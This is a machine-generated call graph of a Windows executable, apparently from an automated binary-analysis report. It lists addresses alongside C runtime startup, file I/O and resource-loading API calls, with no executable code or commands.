104545->104547 104663 ff7da6 58 API calls 3 library calls 104545->104663 104546 ff7c67 104580 ff8b7c GetProcessHeap 104546->104580 104581 ff9ae6 104547->104581 104550 ff7cd0 104551 ff7cdb __RTC_Initialize 104550->104551 104664 ff7da6 58 API calls 3 library calls 104550->104664 104602 ffd5d2 104551->104602 104554 ff7cea 104555 ff7cf6 GetCommandLineW 104554->104555 104665 ff7da6 58 API calls 3 library calls 104554->104665 104621 1004f23 GetEnvironmentStringsW 104555->104621 104558 ff7cf5 104558->104555 104561 ff7d10 104562 ff7d1b 104561->104562 104666 ff30b5 58 API calls 3 library calls 104561->104666 104631 1004d58 104562->104631 104565 ff7d21 104566 ff7d2c 104565->104566 104667 ff30b5 58 API calls 3 library calls 104565->104667 104645 ff30ef 104566->104645 104569 ff7d34 104570 ff7d3f __wwincmdln 104569->104570 104668 ff30b5 58 API calls 3 library calls 104569->104668 104651 fd47d0 104570->104651 104573 ff7d53 104574 ff7d62 104573->104574 104669 ff3358 58 API calls _doexit 104573->104669 104670 ff30e0 58 API calls _doexit 104574->104670 104577 ff7d67 _fprintf 104579 ff9e1e 104578->104579 104579->104546 104580->104545 104671 ff3187 36 API calls 2 library calls 104581->104671 104583 ff9aeb 104672 ff9d3c InitializeCriticalSectionAndSpinCount __mtinitlocks 104583->104672 104585 ff9af0 104586 ff9af4 104585->104586 104674 ff9d8a TlsAlloc 104585->104674 104673 ff9b5c 61 API calls 2 library calls 104586->104673 104589 ff9af9 104589->104550 104590 ff9b06 104590->104586 104591 ff9b11 104590->104591 104675 ff87d5 104591->104675 104594 ff9b53 104683 ff9b5c 61 API calls 2 library calls 104594->104683 104597 ff9b32 104597->104594 104599 ff9b38 104597->104599 104598 ff9b58 104598->104550 104682 ff9a33 58 API calls 4 library calls 104599->104682 104601 ff9b40 GetCurrentThreadId 104601->104550 104603 ffd5de _fprintf 104602->104603 104604 ff9c0b __lock 58 API calls 104603->104604 104605 ffd5e5 104604->104605 104606 ff87d5 __calloc_crt 58 API calls 104605->104606 104608 ffd5f6 104606->104608 104607 ffd661 GetStartupInfoW 104615 ffd676 104607->104615 104618 ffd7a5 104607->104618 104608->104607 104609 ffd601 @_EH4_CallFilterFunc@8 _fprintf 104608->104609 104609->104554 104610 ffd86d 104697 ffd87d LeaveCriticalSection _doexit 104610->104697 104612 ff87d5 __calloc_crt 58 API calls 104612->104615 104613 ffd7f2 GetStdHandle 104613->104618 104614 ffd805 GetFileType 104614->104618 104615->104612 104617 ffd6c4 104615->104617 104615->104618 104616 ffd6f8 GetFileType 104616->104617 104617->104616 104617->104618 104695 ff9e2b InitializeCriticalSectionAndSpinCount 104617->104695 104618->104610 104618->104613 104618->104614 104696 ff9e2b InitializeCriticalSectionAndSpinCount 104618->104696 104622 1004f34 104621->104622 104623 ff7d06 104621->104623 104698 ff881d 58 API calls 2 library calls 104622->104698 104627 1004b1b GetModuleFileNameW 104623->104627 104625 1004f5a _memmove 104626 1004f70 FreeEnvironmentStringsW 104625->104626 104626->104623 104628 1004b4f _wparse_cmdline 104627->104628 104630 1004b8f _wparse_cmdline 104628->104630 104699 ff881d 58 API calls 2 library calls 104628->104699 104630->104561 104632 1004d71 __NMSG_WRITE 104631->104632 104633 1004d69 104631->104633 104634 ff87d5 __calloc_crt 58 API calls 104632->104634 104633->104565 104637 1004d9a __NMSG_WRITE 104634->104637 104635 1004df1 104636 ff2d55 _free 58 API calls 104635->104636 104636->104633 104637->104633 104637->104635 104638 ff87d5 __calloc_crt 58 API calls 104637->104638 104639 1004e16 104637->104639 104642 1004e2d 104637->104642 104700 1004607 58 API calls 2 library calls 104637->104700 104638->104637 104640 ff2d55 _free 58 API calls 104639->104640 104640->104633 104701 ff8dc6 IsProcessorFeaturePresent 104642->104701 104644 1004e39 104644->104565 104647 ff30fb __IsNonwritableInCurrentImage 104645->104647 104724 ffa4d1 104647->104724 104648 ff3119 __initterm_e 104649 ff2d40 __cinit 67 API calls 104648->104649 104650 ff3138 __cinit __IsNonwritableInCurrentImage 104648->104650 104649->104650 104650->104569 104652 fd47ea 104651->104652 104662 fd4889 104651->104662 104653 fd4824 IsThemeActive 104652->104653 104727 ff336c 104653->104727 104657 fd4850 104739 fd48fd SystemParametersInfoW SystemParametersInfoW 104657->104739 104659 fd485c 104740 fd3b3a 104659->104740 104661 fd4864 SystemParametersInfoW 104661->104662 104662->104573 104663->104547 104664->104551 104665->104558 104669->104574 104670->104577 104671->104583 104672->104585 104673->104589 104674->104590 104678 ff87dc 104675->104678 104677 ff8817 104677->104594 104681 ff9de6 TlsSetValue 104677->104681 104678->104677 104680 ff87fa 104678->104680 104684 10051f6 104678->104684 104680->104677 104680->104678 104692 ffa132 Sleep 104680->104692 104681->104597 104682->104601 104683->104598 104685 1005201 104684->104685 104690 100521c 104684->104690 104686 100520d 104685->104686 104685->104690 104693 ff8b28 58 API calls __getptd_noexit 104686->104693 104688 100522c RtlAllocateHeap 104689 1005212 104688->104689 104688->104690 104689->104678 104690->104688 104690->104689 104694 ff33a1 DecodePointer 104690->104694 104692->104680 104693->104689 104694->104690 104695->104617 104696->104618 104697->104609 104698->104625 104699->104630 104700->104637 104702 ff8dd1 104701->104702 104707 ff8c59 104702->104707 104706 ff8dec 104706->104644 104708 ff8c73 _memset ___raise_securityfailure 104707->104708 104709 ff8c93 IsDebuggerPresent 104708->104709 104715 ffa155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104709->104715 104712 ff8d7a 104714 ffa140 GetCurrentProcess TerminateProcess 104712->104714 104713 ff8d57 ___raise_securityfailure 104716 ffc5f6 104713->104716 104714->104706 104715->104713 104717 ffc5fe 104716->104717 104718 ffc600 IsProcessorFeaturePresent 104716->104718 104717->104712 104720 100590a 104718->104720 104723 10058b9 5 API calls ___raise_securityfailure 104720->104723 104722 10059ed 104722->104712 104723->104722 104725 ffa4d4 EncodePointer 104724->104725 104725->104725 104726 ffa4ee 104725->104726 104726->104648 104728 ff9c0b __lock 58 API calls 104727->104728 104729 ff3377 DecodePointer EncodePointer 104728->104729 104792 ff9d75 LeaveCriticalSection 104729->104792 104731 fd4849 104732 ff33d4 104731->104732 104733 ff33de 104732->104733 104734 ff33f8 104732->104734 104733->104734 104793 ff8b28 58 API calls __getptd_noexit 104733->104793 104734->104657 104736 ff33e8 104794 ff8db6 9 API calls __mbschr_l 104736->104794 104738 ff33f3 104738->104657 104739->104659 104741 fd3b47 __ftell_nolock 104740->104741 104742 fd7667 59 API calls 104741->104742 104743 fd3b51 GetCurrentDirectoryW 104742->104743 104795 fd3766 104743->104795 104745 fd3b7a IsDebuggerPresent 104746 100d272 MessageBoxA 104745->104746 104747 fd3b88 104745->104747 104750 100d28c 104746->104750 104748 fd3c61 104747->104748 104747->104750 104751 fd3ba5 104747->104751 104749 fd3c68 SetCurrentDirectoryW 104748->104749 104754 fd3c75 Mailbox 104749->104754 105005 fd7213 59 API calls Mailbox 104750->105005 104876 fd7285 104751->104876 104754->104661 104755 100d29c 104760 100d2b2 SetCurrentDirectoryW 104755->104760 104757 fd3bc3 GetFullPathNameW 104758 fd7bcc 59 API calls 104757->104758 104759 fd3bfe 104758->104759 104892 fe092d 104759->104892 104760->104754 104763 fd3c1c 104764 fd3c26 104763->104764 105006 102874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104763->105006 104908 fd3a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104764->104908 104767 100d2cf 104767->104764 104771 100d2e0 104767->104771 104773 fd4706 61 API calls 104771->104773 104792->104731 104793->104736 104794->104738 104796 fd7667 59 API calls 104795->104796 104797 fd377c 104796->104797 105007 fd3d31 104797->105007 104799 fd379a 104800 fd4706 61 API calls 104799->104800 104801 fd37ae 104800->104801 104802 fd7de1 59 API calls 104801->104802 104803 fd37bb 104802->104803 105021 fd4ddd 104803->105021 104806 fd37dc Mailbox 104811 fd8047 59 API calls 104806->104811 104807 100d173 105084 103955b 104807->105084 104810 100d192 104813 ff2d55 _free 58 API calls 104810->104813 104814 fd37ef 104811->104814 104815 100d19f 104813->104815 105045 fd928a 104814->105045 104818 fd4e4a 84 API calls 104815->104818 104819 100d1a8 104818->104819 104823 fd3ed0 59 API calls 104819->104823 104820 fd7de1 59 API calls 104821 fd3808 104820->104821 104822 fd84c0 69 API calls 104821->104822 104824 fd381a Mailbox 104822->104824 104825 100d1c3 104823->104825 104826 fd7de1 59 API calls 104824->104826 104827 fd3ed0 59 API calls 104825->104827 104828 fd3840 104826->104828 104829 100d1df 104827->104829 104830 fd84c0 69 API calls 104828->104830 104831 fd4706 61 API calls 104829->104831 104833 fd384f Mailbox 104830->104833 104832 100d204 104831->104832 104834 fd3ed0 59 API calls 104832->104834 104836 fd7667 59 API calls 104833->104836 104835 100d210 104834->104835 104838 fd8047 59 API calls 104835->104838 104837 fd386d 104836->104837 105048 fd3ed0 104837->105048 104839 100d21e 104838->104839 104841 fd3ed0 59 API calls 104839->104841 104843 100d22d 104841->104843 104849 fd8047 59 API calls 104843->104849 104845 fd3887 104845->104819 104846 fd3891 104845->104846 104847 ff2efd _W_store_winword 60 API calls 104846->104847 104848 fd389c 104847->104848 104848->104825 104850 fd38a6 104848->104850 104851 100d24f 104849->104851 104852 ff2efd _W_store_winword 60 API calls 104850->104852 104853 fd3ed0 59 API calls 104851->104853 104854 fd38b1 104852->104854 104855 100d25c 104853->104855 104854->104829 104856 fd38bb 104854->104856 104855->104855 104857 ff2efd _W_store_winword 60 API calls 104856->104857 104858 fd38c6 104857->104858 104858->104843 104859 fd3907 104858->104859 104861 fd3ed0 59 API calls 104858->104861 104859->104843 104860 fd3914 104859->104860 105064 fd92ce 104860->105064 104862 fd38ea 104861->104862 104864 fd8047 59 API calls 104862->104864 104866 fd38f8 104864->104866 104868 fd3ed0 59 API calls 104866->104868 104868->104859 104871 fd928a 59 API calls 104873 fd394f 104871->104873 104872 fd8ee0 60 API calls 104872->104873 104873->104871 104873->104872 104874 fd3ed0 59 API calls 104873->104874 104875 fd3995 Mailbox 104873->104875 104874->104873 104875->104745 104877 fd7292 __ftell_nolock 104876->104877 104878 fd72ab 104877->104878 104879 100ea22 _memset 104877->104879 104880 fd4750 60 API calls 104878->104880 104881 100ea3e GetOpenFileNameW 104879->104881 104882 fd72b4 104880->104882 104883 100ea8d 104881->104883 105939 ff0791 104882->105939 104885 fd7bcc 59 API calls 104883->104885 104887 100eaa2 104885->104887 104887->104887 104889 fd72c9 105957 fd686a 104889->105957 104893 fe093a __ftell_nolock 104892->104893 106262 fd6d80 104893->106262 104895 fe093f 104907 fd3c14 104895->104907 106273 fe119e 89 API calls 104895->106273 104897 fe094c 104897->104907 106274 fe3ee7 91 API calls Mailbox 104897->106274 104899 fe0955 104900 fe0959 GetFullPathNameW 104899->104900 104899->104907 104901 fd7bcc 59 API calls 104900->104901 104907->104755 104907->104763 104909 100d261 104908->104909 104910 fd3ab0 LoadImageW RegisterClassExW 104908->104910 105005->104755 105006->104767 105008 fd3d3e __ftell_nolock 105007->105008 105009 fd7bcc 59 API calls 105008->105009 105014 fd3ea4 Mailbox 105008->105014 105011 fd3d70 105009->105011 105017 fd3da6 Mailbox 105011->105017 105125 fd79f2 105011->105125 105012 fd3e77 105013 fd7de1 59 API calls 105012->105013 105012->105014 105016 fd3e98 105013->105016 105014->104799 105015 fd7de1 59 API calls 105015->105017 105018 fd3f74 59 API calls 105016->105018 105017->105012 105017->105014 105017->105015 105019 fd79f2 59 API calls 105017->105019 105020 fd3f74 59 API calls 105017->105020 105018->105014 105019->105017 105020->105017 105128 fd4bb5 105021->105128 105026 fd4e08 LoadLibraryExW 105138 fd4b6a 105026->105138 105027 100d8e6 105029 fd4e4a 84 API calls 105027->105029 105031 100d8ed 105029->105031 105033 fd4b6a 3 API calls 105031->105033 105034 100d8f5 105033->105034 105164 fd4f0b 105034->105164 105035 fd4e2f 105035->105034 105036 fd4e3b 105035->105036 105038 fd4e4a 84 API calls 105036->105038 105040 fd37d4 105038->105040 105040->104806 105040->104807 105042 100d91c 105172 fd4ec7 105042->105172 105044 100d929 105046 ff0db6 Mailbox 59 API calls 105045->105046 105047 fd37fb 105046->105047 105047->104820 105049 fd3eda 105048->105049 105050 fd3ef3 105048->105050 105051 fd8047 59 API calls 105049->105051 105052 fd7bcc 59 API calls 105050->105052 105053 fd3879 105051->105053 105052->105053 105054 ff2efd 105053->105054 105055 ff2f7e 105054->105055 105056 ff2f09 105054->105056 105601 ff2f90 60 API calls 4 library calls 105055->105601 105063 ff2f2e 105056->105063 105599 ff8b28 58 API calls __getptd_noexit 105056->105599 105058 ff2f8b 105058->104845 105060 ff2f15 105600 ff8db6 9 API calls __mbschr_l 105060->105600 105062 ff2f20 105062->104845 105063->104845 105065 fd92d6 105064->105065 105066 ff0db6 Mailbox 59 API calls 105065->105066 105067 fd92e4 105066->105067 105068 fd3924 105067->105068 105602 fd91fc 59 API calls Mailbox 105067->105602 105070 fd9050 105068->105070 105603 fd9160 105070->105603 105072 fd905f 105073 ff0db6 Mailbox 59 API calls 105072->105073 105074 fd3932 105072->105074 105073->105074 105075 fd8ee0 105074->105075 105076 100f17c 105075->105076 105079 fd8ef7 105075->105079 105076->105079 105613 fd8bdb 59 API calls Mailbox 105076->105613 105078 fd8fff 105078->104873 105079->105078 105080 fd8ff8 105079->105080 105081 fd9040 105079->105081 105082 ff0db6 Mailbox 59 API calls 105080->105082 105612 fd9d3c 60 API calls Mailbox 105081->105612 105082->105078 105085 fd4ee5 85 API calls 105084->105085 105086 10395ca 105085->105086 105614 1039734 105086->105614 105089 fd4f0b 74 API calls 105090 10395f7 105089->105090 105091 fd4f0b 74 API calls 105090->105091 105092 1039607 105091->105092 105093 fd4f0b 74 API calls 105092->105093 105094 1039622 105093->105094 105095 fd4f0b 74 API calls 105094->105095 105096 103963d 105095->105096 105097 fd4ee5 85 API calls 105096->105097 105098 1039654 105097->105098 105099 ff571c __crtCompareStringA_stat 58 API calls 105098->105099 105100 103965b 105099->105100 105101 ff571c __crtCompareStringA_stat 58 API calls 105100->105101 105102 1039665 105101->105102 105103 fd4f0b 74 API calls 105102->105103 105104 1039679 105103->105104 105105 1039109 GetSystemTimeAsFileTime 105104->105105 105106 103968c 105105->105106 105107 10396a1 105106->105107 105108 10396b6 105106->105108 105111 ff2d55 _free 58 API calls 105107->105111 105109 103971b 105108->105109 105110 10396bc 105108->105110 105113 ff2d55 _free 58 API calls 105109->105113 105620 1038b06 105110->105620 105114 10396a7 105111->105114 105117 100d186 105113->105117 105115 ff2d55 _free 58 API calls 105114->105115 105115->105117 105117->104810 105119 fd4e4a 105117->105119 105118 ff2d55 _free 58 API calls 105118->105117 105120 fd4e5b 105119->105120 105121 fd4e54 105119->105121 105123 fd4e7b FreeLibrary 105120->105123 105124 fd4e6a 105120->105124 105122 ff53a6 __fcloseall 83 API calls 105121->105122 105122->105120 105123->105124 105124->104810 105126 fd7e4f 59 API calls 105125->105126 105127 fd79fd 105126->105127 105127->105011 105177 fd4c03 105128->105177 105131 fd4bdc 105132 fd4bec FreeLibrary 105131->105132 105133 fd4bf5 105131->105133 105132->105133 105135 ff525b 105133->105135 105134 fd4c03 2 API calls 105134->105131 105181 ff5270 105135->105181 105137 fd4dfc 105137->105026 105137->105027 105339 fd4c36 105138->105339 105141 fd4c36 2 API calls 105144 fd4b8f 105141->105144 105142 fd4baa 105145 fd4c70 105142->105145 105143 fd4ba1 FreeLibrary 105143->105142 105144->105142 105144->105143 105146 ff0db6 Mailbox 59 API calls 105145->105146 105147 fd4c85 105146->105147 105148 fd522e 59 API calls 105147->105148 105149 fd4c91 _memmove 105148->105149 105150 fd4ccc 105149->105150 105152 fd4d89 105149->105152 105153 fd4dc1 105149->105153 105151 fd4ec7 69 API calls 105150->105151 105161 fd4cd5 105151->105161 105343 fd4e89 CreateStreamOnHGlobal 105152->105343 105354 103991b 95 API calls 105153->105354 105156 fd4f0b 74 API calls 105156->105161 105158 fd4d69 105158->105035 105159 100d8a7 105160 fd4ee5 85 API calls 105159->105160 105162 100d8bb 105160->105162 105161->105156 105161->105158 105161->105159 105349 fd4ee5 105161->105349 105163 fd4f0b 74 API calls 105162->105163 105163->105158 105165 fd4f1d 105164->105165 105168 100d9cd 105164->105168 105378 ff55e2 105165->105378 105169 1039109 105576 1038f5f 105169->105576 105171 103911f 105171->105042 105173 fd4ed6 105172->105173 105175 100d990 105172->105175 105581 ff5c60 105173->105581 105176 fd4ede 105176->105044 105178 fd4bd0 105177->105178 105179 fd4c0c LoadLibraryA 105177->105179 105178->105131 105178->105134 105179->105178 105180 fd4c1d GetProcAddress 105179->105180 105180->105178 105184 ff527c _fprintf 105181->105184 105182 ff528f 105230 ff8b28 58 API calls __getptd_noexit 105182->105230 105184->105182 105186 ff52c0 105184->105186 105185 ff5294 105231 ff8db6 9 API calls __mbschr_l 105185->105231 105200 10004e8 105186->105200 105189 ff52c5 105190 ff52ce 105189->105190 105191 ff52db 105189->105191 105232 ff8b28 58 API calls __getptd_noexit 105190->105232 105193 ff5305 105191->105193 105194 ff52e5 105191->105194 105215 1000607 105193->105215 105233 ff8b28 58 API calls __getptd_noexit 105194->105233 105197 ff529f @_EH4_CallFilterFunc@8 _fprintf 105197->105137 105201 10004f4 _fprintf 105200->105201 105202 ff9c0b __lock 58 API calls 105201->105202 105213 1000502 105202->105213 105203 1000576 105235 10005fe 105203->105235 105204 100057d 105240 ff881d 58 API calls 2 library calls 105204->105240 105207 10005f3 _fprintf 105207->105189 105208 1000584 105208->105203 105241 ff9e2b InitializeCriticalSectionAndSpinCount 105208->105241 105210 ff9c93 __mtinitlocknum 58 API calls 105210->105213 105212 10005aa EnterCriticalSection 105212->105203 105213->105203 105213->105204 105213->105210 105238 ff6c50 59 API calls __lock 105213->105238 105239 ff6cba LeaveCriticalSection LeaveCriticalSection _doexit 105213->105239 105216 1000627 __wopenfile 105215->105216 105217 1000641 105216->105217 105229 10007fc 105216->105229 105248 ff37cb 60 API calls 3 library calls 105216->105248 105246 ff8b28 58 API calls __getptd_noexit 105217->105246 105219 1000646 105247 ff8db6 9 API calls __mbschr_l 105219->105247 105221 100085f 105243 10085a1 105221->105243 105223 ff5310 105234 ff5332 LeaveCriticalSection LeaveCriticalSection __wfsopen 105223->105234 105225 10007f5 105225->105229 105249 ff37cb 60 API calls 3 library calls 105225->105249 105227 1000814 105227->105229 105250 ff37cb 60 API calls 3 library calls 105227->105250 105229->105217 105229->105221 105230->105185 105231->105197 105232->105197 105233->105197 105234->105197 105242 ff9d75 LeaveCriticalSection 105235->105242 105237 1000605 105237->105207 105238->105213 105239->105213 105240->105208 105241->105212 105242->105237 105251 1007d85 105243->105251 105245 10085ba 105245->105223 105246->105219 105247->105223 105248->105225 105249->105227 105250->105229 105254 1007d91 _fprintf 105251->105254 105252 1007da7 105336 ff8b28 58 API calls __getptd_noexit 105252->105336 105254->105252 105256 1007ddd 105254->105256 105255 1007dac 105337 ff8db6 9 API calls __mbschr_l 105255->105337 105262 1007e4e 105256->105262 105259 1007df9 105338 1007e22 LeaveCriticalSection __unlock_fhandle 105259->105338 105261 1007db6 _fprintf 105261->105245 105263 1007e6e 105262->105263 105264 ff44ea __wsopen_nolock 58 API calls 105263->105264 105268 1007e8a 105264->105268 105265 1007fc1 105266 ff8dc6 __invoke_watson 8 API calls 105265->105266 105267 10085a0 105266->105267 105270 1007d85 __wsopen_helper 103 API calls 105267->105270 105268->105265 105269 1007ec4 105268->105269 105276 1007ee7 105268->105276 105271 ff8af4 __write 58 API calls 105269->105271 105272 10085ba 105270->105272 105273 1007ec9 105271->105273 105272->105259 105274 ff8b28 _free 58 API calls 105273->105274 105275 1007ed6 105274->105275 105278 ff8db6 __mbschr_l 9 API calls 105275->105278 105277 1007fa5 105276->105277 105284 1007f83 105276->105284 105279 ff8af4 __write 58 API calls 105277->105279 105280 1007ee0 105278->105280 105281 1007faa 105279->105281 105280->105259 105282 ff8b28 _free 58 API calls 105281->105282 105283 1007fb7 105282->105283 105285 ff8db6 __mbschr_l 9 API calls 105283->105285 105286 ffd294 __alloc_osfhnd 61 API calls 105284->105286 105285->105265 105287 1008051 105286->105287 105288 100805b 105287->105288 105289 100807e 105287->105289 105290 ff8af4 __write 58 API calls 105288->105290 105291 1007cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105289->105291 105292 1008060 105290->105292 105299 10080a0 105291->105299 105294 ff8b28 _free 58 API calls 105292->105294 105293 100811e GetFileType 105297 1008129 GetLastError 105293->105297 105298 100816b 105293->105298 105296 100806a 105294->105296 105295 10080ec GetLastError 105300 ff8b07 __dosmaperr 58 API calls 105295->105300 105301 ff8b28 _free 58 API calls 105296->105301 105302 ff8b07 __dosmaperr 58 API calls 105297->105302 105308 ffd52a __set_osfhnd 59 API calls 105298->105308 105299->105293 105299->105295 105303 1007cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105299->105303 105304 1008111 105300->105304 105301->105280 105305 1008150 CloseHandle 105302->105305 105307 10080e1 105303->105307 105310 ff8b28 _free 58 API calls 105304->105310 105305->105304 105306 100815e 105305->105306 105309 ff8b28 _free 58 API calls 105306->105309 105307->105293 105307->105295 105313 1008189 105308->105313 105311 1008163 105309->105311 105310->105265 105311->105304 105312 1008344 105312->105265 105315 1008517 CloseHandle 105312->105315 105313->105312 105314 10018c1 __lseeki64_nolock 60 API calls 105313->105314 105332 100820a 105313->105332 105316 10081f3 105314->105316 105317 1007cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105315->105317 105318 ff8af4 __write 58 API calls 105316->105318 105316->105332 105320 100853e 105317->105320 105318->105332 105319 1000e5b 70 API calls __read_nolock 105319->105332 105321 1008546 GetLastError 105320->105321 105322 1008572 105320->105322 105323 ff8b07 __dosmaperr 58 API calls 105321->105323 105322->105265 105324 1008552 105323->105324 105327 ffd43d __free_osfhnd 59 API calls 105324->105327 105325 1000add __close_nolock 61 API calls 105325->105332 105326 100823c 105328 10097a2 __chsize_nolock 82 API calls 105326->105328 105326->105332 105327->105322 105328->105326 105329 10018c1 60 API calls __lseeki64_nolock 105329->105332 105330 ffd886 __write 78 API calls 105330->105332 105331 10083c1 105333 1000add __close_nolock 61 API calls 105331->105333 105332->105312 105332->105319 105332->105325 105332->105326 105332->105329 105332->105330 105332->105331 105334 10083c8 105333->105334 105335 ff8b28 _free 58 API calls 105334->105335 105335->105265 105336->105255 105337->105261 105338->105261 105340 fd4b83 105339->105340 105341 fd4c3f LoadLibraryA 105339->105341 105340->105141 105340->105144 105341->105340 105342 fd4c50 GetProcAddress 105341->105342 105342->105340 105344 fd4ea3 FindResourceExW 105343->105344 105346 fd4ec0 105343->105346 105345 100d933 LoadResource 105344->105345 105344->105346 105345->105346 105347 100d948 SizeofResource 105345->105347 105346->105150 105347->105346 105348 100d95c LockResource 105347->105348 105348->105346 105350 fd4ef4 105349->105350 105351 100d9ab 105349->105351 105355 ff584d 105350->105355 105353 fd4f02 105353->105161 105354->105150 105357 ff5859 _fprintf 105355->105357 105356 ff586b 105368 ff8b28 58 API calls __getptd_noexit 105356->105368 105357->105356 105359 ff5891 105357->105359 105370 ff6c11 105359->105370 105360 ff5870 105369 ff8db6 9 API calls __mbschr_l 105360->105369 105363 ff5897 105376 ff57be 83 API calls 5 library calls 105363->105376 105365 ff58a6 105377 ff58c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 105365->105377 105367 ff587b _fprintf 105367->105353 105368->105360 105369->105367 105371 ff6c43 EnterCriticalSection 105370->105371 105372 ff6c21 105370->105372 105373 ff6c39 105371->105373 105372->105371 105374 ff6c29 105372->105374 105373->105363 105375 ff9c0b __lock 58 API calls 105374->105375 105375->105373 105376->105365 105377->105367 105381 ff55fd 105378->105381 105380 fd4f2e 105380->105169 105382 ff5609 _fprintf 105381->105382 105383 ff564c 105382->105383 105384 ff5644 _fprintf 105382->105384 105386 ff561f _memset 105382->105386 105385 ff6c11 __lock_file 59 API calls 105383->105385 105384->105380 105387 ff5652 105385->105387 105408 ff8b28 58 API calls __getptd_noexit 105386->105408 105394 ff541d 105387->105394 105389 ff5639 105409 ff8db6 9 API calls __mbschr_l 105389->105409 105395 ff5453 105394->105395 105398 ff5438 _memset 105394->105398 105410 ff5686 LeaveCriticalSection LeaveCriticalSection __wfsopen 105395->105410 105396 ff5443 105506 ff8b28 58 API calls __getptd_noexit 105396->105506 105398->105395 105398->105396 105401 ff5493 105398->105401 105401->105395 105402 ff55a4 _memset 105401->105402 105411 ff46e6 105401->105411 105418 1000e5b 105401->105418 105486 1000ba7 105401->105486 105508 1000cc8 58 API calls 4 library calls 105401->105508 105509 ff8b28 58 API calls __getptd_noexit 105402->105509 105406 ff5448 105507 ff8db6 9 API calls __mbschr_l 105406->105507 105408->105389 105409->105384 105410->105384 105412 ff4705 105411->105412 105413 ff46f0 105411->105413 105412->105401 105510 ff8b28 58 API calls __getptd_noexit 105413->105510 105415 ff46f5 105511 ff8db6 9 API calls __mbschr_l 105415->105511 105417 ff4700 105417->105401 105419 1000e93 105418->105419 105420 1000e7c 105418->105420 105422 10015cb 105419->105422 105426 1000ecd 105419->105426 105521 ff8af4 58 API calls __getptd_noexit 105420->105521 105537 ff8af4 58 API calls __getptd_noexit 105422->105537 105423 1000e81 105522 ff8b28 58 API calls __getptd_noexit 105423->105522 105428 1000ed5 105426->105428 105436 1000eec 105426->105436 105427 10015d0 105538 ff8b28 58 API calls __getptd_noexit 105427->105538 105523 ff8af4 58 API calls __getptd_noexit 105428->105523 105430 1000e88 105430->105401 105432 1000ee1 105539 ff8db6 9 API calls __mbschr_l 105432->105539 105433 1000eda 105524 ff8b28 58 API calls __getptd_noexit 105433->105524 105435 1000f01 105525 ff8af4 58 API calls __getptd_noexit 105435->105525 105436->105430 105436->105435 105438 1000f1b 105436->105438 105440 1000f39 105436->105440 105438->105435 105443 1000f26 105438->105443 105526 ff881d 58 API calls 2 library calls 105440->105526 105512 1005c6b 105443->105512 105444 1000f49 105445 1000f51 105444->105445 105446 1000f6c 105444->105446 105527 ff8b28 58 API calls __getptd_noexit 105445->105527 105529 10018c1 60 API calls 3 library calls 105446->105529 105447 100103a 105449 10010b3 ReadFile 105447->105449 105454 1001050 GetConsoleMode 105447->105454 105452 1001593 GetLastError 105449->105452 105453 10010d5 105449->105453 105451 1000f56 105528 ff8af4 58 API calls __getptd_noexit 105451->105528 105456 10015a0 105452->105456 105457 1001093 105452->105457 105453->105452 105461 10010a5 105453->105461 105458 10010b0 105454->105458 105459 1001064 105454->105459 105535 ff8b28 58 API calls __getptd_noexit 105456->105535 105468 1001099 105457->105468 105530 ff8b07 58 API calls 2 library calls 105457->105530 105458->105449 105459->105458 105462 100106a ReadConsoleW 105459->105462 105461->105468 105469 100110a 105461->105469 105472 1001377 105461->105472 105462->105461 105464 100108d GetLastError 105462->105464 105463 10015a5 105536 ff8af4 58 API calls __getptd_noexit 105463->105536 105464->105457 105467 ff2d55 _free 58 API calls 105467->105430 105468->105430 105468->105467 105470 1001176 ReadFile 105469->105470 105477 10011f7 105469->105477 105474 1001197 GetLastError 105470->105474 105484 10011a1 105470->105484 105472->105468 105473 100147d ReadFile 105472->105473 105479 10014a0 GetLastError 105473->105479 105485 10014ae 105473->105485 105474->105484 105475 10012b4 105480 1001264 MultiByteToWideChar 105475->105480 105533 10018c1 60 API calls 3 library calls 105475->105533 105476 10012a4 105532 ff8b28 58 API calls __getptd_noexit 105476->105532 105477->105468 105477->105475 105477->105476 105477->105480 105479->105485 105480->105464 105480->105468 105484->105469 105531 10018c1 60 API calls 3 library calls 105484->105531 105485->105472 105534 10018c1 60 API calls 3 library calls 105485->105534 105487 1000bb2 105486->105487 105491 1000bc7 105486->105491 105573 ff8b28 58 API calls __getptd_noexit 105487->105573 105489 1000bb7 105574 ff8db6 9 API calls __mbschr_l 105489->105574 105492 1000bfc 105491->105492 105500 1000bc2 105491->105500 105575 1005fe4 58 API calls __malloc_crt 105491->105575 105494 ff46e6 __output_l 58 API calls 105492->105494 105495 1000c10 105494->105495 105540 1000d47 105495->105540 105497 1000c17 105498 ff46e6 __output_l 58 API calls 105497->105498 105497->105500 105499 1000c3a 105498->105499 105499->105500 105501 ff46e6 __output_l 58 API calls 105499->105501 105500->105401 105502 1000c46 105501->105502 105502->105500 105503 ff46e6 __output_l 58 API calls 105502->105503 105504 1000c53 105503->105504 105505 ff46e6 __output_l 58 API calls 105504->105505 105505->105500 105506->105406 105507->105395 105508->105401 105509->105406 105510->105415 105511->105417 105513 1005c83 105512->105513 105514 1005c76 105512->105514 105516 1005c8f 105513->105516 105517 ff8b28 _free 58 API calls 105513->105517 105515 ff8b28 _free 58 API calls 105514->105515 105518 1005c7b 105515->105518 105516->105447 105519 1005cb0 105517->105519 105518->105447 105520 ff8db6 __mbschr_l 9 API calls 105519->105520 105520->105518 105521->105423 105522->105430 105523->105433 105524->105432 105525->105433 105526->105444 105527->105451 105528->105430 105529->105443 105530->105468 105531->105484 105532->105468 105533->105480 105534->105485 105535->105463 105536->105468 105537->105427 105538->105432 105539->105430 105541 1000d53 _fprintf 105540->105541 105542 1000d60 105541->105542 105543 1000d77 105541->105543 105544 ff8af4 __write 58 API calls 105542->105544 105545 1000e3b 105543->105545 105548 1000d8b 105543->105548 105547 1000d65 105544->105547 105546 ff8af4 __write 58 API calls 105545->105546 105549 1000dae 105546->105549 105550 ff8b28 _free 58 API calls 105547->105550 105551 1000db6 105548->105551 105552 1000da9 105548->105552 105558 ff8b28 _free 58 API calls 105549->105558 105553 1000d6c _fprintf 105550->105553 105555 1000dc3 105551->105555 105556 1000dd8 105551->105556 105554 ff8af4 __write 58 API calls 105552->105554 105553->105497 105554->105549 105559 ff8af4 __write 58 API calls 105555->105559 105557 ffd206 